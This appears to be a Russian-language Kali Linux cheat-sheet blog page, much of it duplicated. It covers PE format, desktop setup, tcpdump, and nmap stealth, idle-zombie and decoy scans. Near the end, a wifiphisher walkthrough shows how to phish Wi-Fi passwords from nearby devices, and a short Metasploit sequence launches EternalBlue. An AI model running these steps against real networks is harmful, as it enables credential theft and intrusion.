kali — b14esh.com

pe_format7

DOS заголовок
четыре байта 4D 5a   значение Mz
текст ..program cannot be run Dos mode.
так же  адрес начало pe заголовка. 50 45 значение Pe

PE заголовок
5045 значение Pe
Здесь мы можем увидеть список секций. обычно не больше 10.
У каждой секции есть атрибуты чтения, записи и исполнения.
Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы. 

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.
.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.
.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.



petools программа для ковыряния исполнительных файлов.
entry point адресс входа в программу

DOS заголовок

четыре байта 4D 5a значение Mz

текст ..program cannot be run Dos mode.

так же адрес начало pe заголовка. 50 45 значение Pe

PE заголовок

5045 значение Pe

Здесь мы можем увидеть список секций. обычно не больше 10.

У каждой секции есть атрибуты чтения, записи и исполнения.

Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы.

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.

.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.

.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.

petools программа для ковыряния исполнительных файлов.

entry point адресс входа в программу

Из одного видео по безопасности :)

Пользователь:

Пользователь никогда не должен иметь доступ к источнику информации.

1	Пользователь никогда не должен иметь доступ к источнику информации.

Вирусы:

Блокировщики
Диструкторы
Шифраторы
Шпионы
Ботнет-DDOS

Блокировщики

Диструкторы

Шифраторы

Шпионы

Ботнет-DDOS

Запуск:

1. autorun.inf
2. авто установщики / авто архивы
3. скрипты\зараженные страницы.
4. java \ flash \ ПО \ ОС \ дыры

1. autorun.inf

2. авто установщики / авто архивы

3. скрипты\зараженные страницы.

4. java \ flash \ ПО \ ОС \ дыры

Защита:

1. Сканирование
2. Запуск в песочнице
3. Отслеживание действий
4. Проверка записи
5. Полная проверка (drweb cureit) AVZ

1. Сканирование

2. Запуск в песочнице

3. Отслеживание действий

4. Проверка записи

5. Полная проверка (drweb cureit) AVZ

Запись неверной инфы в программу / данные:

вероятные события
1. остановка
2. не верный результат

90% - чтение данных
10% - записи данных

Два сервера первый запись и чтение. 
а второй резервный только запись
в сучили аварии основного сервера начинаем использовать резервный.

вероятные события

1. остановка

2. не верный результат

90% - чтение данных

10% - записи данных

Два сервера первый запись и чтение.

а второй резервный только запись

в сучили аварии основного сервера начинаем использовать резервный.

пароли — подбор:

1. 62 варианта
2. 62 в квадрате 3844
3. Не Болтай..... шоколадки рулят...
4. простые пароли
5. вскрываемые социальные пароли
6. одиночные слова и короткие фразы
7. пустой пароль

1. 62 варианта

2. 62 в квадрате 3844

3. Не Болтай..... шоколадки рулят...

4. простые пароли

5. вскрываемые социальные пароли

6. одиночные слова и короткие фразы

7. пустой пароль

dotNET

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп
J Sharp = J# джишарп
Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык
http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты
net.reflector + addons reflexil.netreflector
ilspy

Крэкми
Можем редактировать только il  язык

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп

J Sharp = J# джишарп

Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык

http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты

net.reflector + addons reflexil.netreflector

ilspy

Крэкми

Можем редактировать только il язык

Как изменить фон GRUB в Kali Linux

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка
/usr/share/images/desktop-base/kali-grub.png - само изображение тут
mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла
cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png  - копируем нашу новую заставку для grub
update-grub - просим grub перечитать конфиг файлы

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка

/usr/share/images/desktop-base/kali-grub.png - само изображение тут

mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла

cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png - копируем нашу новую заставку для grub

update-grub - просим grub перечитать конфиг файлы

Решение ошибки «Следующие подписи неверные» в Kali Linux

wget 'https://archive.kali.org/archive-key.asc'
apt-key add archive-key.asc

1 2	wget 'https://archive.kali.org/archive-key.asc' apt-key add archive-key.asc

x \ xwindows \ gnome \ Cinnamon \ KDE \ LXDE \ MATE

Cinnamon

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка 

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

Установка Xfce в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка
sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

1 2	sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

Установка KDE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка 
udo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная
sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка

udo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная

sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

Установка LXDE в Kali Linux:

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка 

sudo apt-get remove lxde-core lxde - удаление

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove lxde-core lxde - удаление

Установка GNOME в Kali Linux:

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

Установка MATE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core  - удаление

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core - удаление

Установка e17 в Kali Linux:

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление

Изменить окружение из установленных:

Используйте следующую команду чтобы выбрать главное окружение рабочего стола. 
Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

Используйте следующую команду чтобы выбрать главное окружение рабочего стола.

Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

Очистка системы \ временные файлы \ кеш обновлений \

!!! Будь осторожен можно сломать дистрибутив
sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО
sudo apt-get autoclean -y - удалить скачанные файлы архивов
sudo apt-get clean -y - удалить старые скачанные файлы архивов
sudo apt-get install -f -y - решение проблем с установкой по

!!! Будь осторожен можно сломать дистрибутив

sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО

sudo apt-get autoclean -y - удалить скачанные файлы архивов

sudo apt-get clean -y - удалить старые скачанные файлы архивов

sudo apt-get install -f -y - решение проблем с установкой по

wi-fi

iwconfig wlan0
iwconfig wlan0 essid name key password 
iwconfig wlan0 essid name key s:password

iwconfig wlan0

iwconfig wlan0 essid name key password

iwconfig wlan0 essid name key s:password

Проверка и исправление репозиториев \ apt \ sources.list

Проверка файла sources.list:

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

Одно из решений, перепишем sources.list:

0. Делаем резервную копию
cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list 
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему
а) так
sudo apt update 
sudo apt upgrade -y 
sudo apt full-upgrade -y

б) или так
sudo apt update && sudo apt full-upgrade -y

0. Делаем резервную копию

cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list

echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему

а) так

sudo apt update

sudo apt upgrade -y

sudo apt full-upgrade -y

б) или так

sudo apt update && sudo apt full-upgrade -y

tcpdump / снифер / sniffer

yum install tcpdump
apt install tcpdump

1 2	yum install tcpdump apt install tcpdump

tcpdump

tcpdump -i eth0 - !!! снифаем интерфейс eth0

tcpdump -n -i eth0 net 192.168.1.15  - трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24  - трафик с/в сеть

tcpdump -l > dump && tail -f dump  - Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0  - Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0 - Запись + загрузка в бинарник

tcpdump -r traffic.eth0  - Читаем из файла

tcpdump port 80  - Весь трафик на 80 порт и ответы

tcpdump host google.com - Весь с/на google.com

tcpdump -i eth0 -X port \(110 or 143\) - Проверка pop и imap на безопасность

tcpdump -n -i eth0 icmp - Ловим pings

tcpdump -i eth0 -s 0 -A port 80 | grep GET - (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address  - узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump |grep -v ssh - поиск пакетов исключая пакеты ssh

tcpdump -i eth0 - !!! снифаем интерфейс eth0

tcpdump -n -i eth0 net 192.168.1.15 - трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24 - трафик с/в сеть

tcpdump -l > dump && tail -f dump - Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0 - Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0 - Запись + загрузка в бинарник

tcpdump -r traffic.eth0 - Читаем из файла

tcpdump port 80 - Весь трафик на 80 порт и ответы

tcpdump host google.com - Весь с/на google.com

tcpdump -i eth0 -X port \(110 or 143\) - Проверка pop и imap на безопасность

tcpdump -n -i eth0 icmp - Ловим pings

tcpdump -i eth0 -s 0 -A port 80 | grep GET - (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address - узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump |grep -v ssh - поиск пакетов исключая пакеты ssh

nmap \ сканер портов

nmap

nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста

nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp)

nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1

nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie 

nmap -O target.host.com - !!! информация о системе 

nmap -vv host.target.com  - !!! стандартный скан подробный вывод

nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт 

nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389

nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов

nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt  - Сканирование машин с ip от 10 по 250  и запись результата
nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования
nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24
nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24
nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)
nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS

nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС

nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты, 
                                         используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование

nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024), 
                                           с отменой ping-опросов и заносим результат в файл scan.txt

nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов, 
                                                     при этом маскируемся двумя хостами (третий наш).


nmap 10.0.0.1 - сканировать порты пк  с IP 10.0.0.1
nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод)
nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24
nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200)

nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста

nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp)

nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1

nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie

nmap -O target.host.com - !!! информация о системе

nmap -vv host.target.com - !!! стандартный скан подробный вывод

nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт

nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389

nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов

nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt - Сканирование машин с ip от 10 по 250 и запись результата

nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования

nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24

nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24

nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)

nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS

nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС

nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты,

используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование

nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024),

с отменой ping-опросов и заносим результат в файл scan.txt

nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов,

при этом маскируемся двумя хостами (третий наш).

nmap 10.0.0.1 - сканировать порты пк с IP 10.0.0.1

nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод)

nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24

nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200)

Некоторые другие полезные инструменты:

hping (http://www.hping.org) - сборщик/анализатор IP пакетов
fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов
round-robin - проверка хостов

hping (http://www.hping.org) - сборщик/анализатор IP пакетов

fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов

round-robin - проверка хостов

wifiphisher

https://www.kali.org/ - ссылка
aireplay-ng -9 wlan0 - проверить подходит ли ваша плата для инжекта
git clone https://github.com/wifiphisher/wifiphisher - ставим по
cd wifisphisher - переходим в каталог
python setup.py install  - ставим по wifiphisher
wifiphisher - запускаем по
1 - у атакуемых устройств в правом нижнем угле высветится сеть и потребует повторной авторизации. 
2 - у атакуемых устройств высветится  сообщение от роутера о том, что необходимо обновить программное обеспечение. 
И потребует ввести ключ безопасности.
Ждем пароль =) как только все покраснеет жмем ctrl+c и увидем пароли

https://www.kali.org/ - ссылка

aireplay-ng -9 wlan0 - проверить подходит ли ваша плата для инжекта

git clone https://github.com/wifiphisher/wifiphisher - ставим по

cd wifisphisher - переходим в каталог

python setup.py install - ставим по wifiphisher

wifiphisher - запускаем по

1 - у атакуемых устройств в правом нижнем угле высветится сеть и потребует повторной авторизации.

2 - у атакуемых устройств высветится сообщение от роутера о том, что необходимо обновить программное обеспечение.

И потребует ввести ключ безопасности.

Ждем пароль =) как только все покраснеет жмем ctrl+c и увидем пароли

metasploit

use kali linux

0) msfconsole - запуск метасплоит
1) use exploit/windows/smb/ms17_10_enternelblue - выбор эксплоита
2) set rhost 127.0.0.01 - выбор ip атакуемого
3) exploit - применить эксплоит

0) msfconsole - запуск метасплоит

1) use exploit/windows/smb/ms17_10_enternelblue - выбор эксплоита

2) set rhost 127.0.0.01 - выбор ip атакуемого

3) exploit - применить эксплоит